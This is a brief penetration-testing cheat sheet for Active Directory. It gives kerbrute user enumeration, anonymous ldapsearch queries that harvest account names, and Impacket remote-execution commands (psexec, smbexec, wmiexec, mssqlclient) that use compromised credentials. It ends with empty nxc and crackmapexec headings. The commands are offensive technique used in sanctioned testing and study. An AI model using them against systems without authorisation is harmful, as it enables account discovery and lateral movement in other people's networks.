Enumeration

Kerbrute - Bruteforcing AD accounts

kerbrute userenum -d <domain> --dc <ip> users.txt
	# Ensure that users.txt contains a list of potential usernames
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)"
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}'
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}' > users.txt

Impacket

Remote Access with:
 smb service -
  impacket-psexec <domain>/<compromised username>:<password>@<IP>
  impacket-smbexec <domain>/<compromised username>:<password>@<IP>
  impacket-wmiexec <domain>/<compromised username>:<password>@<IP>

 sql service -
  impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth

nxc

crackmapexec

Last updated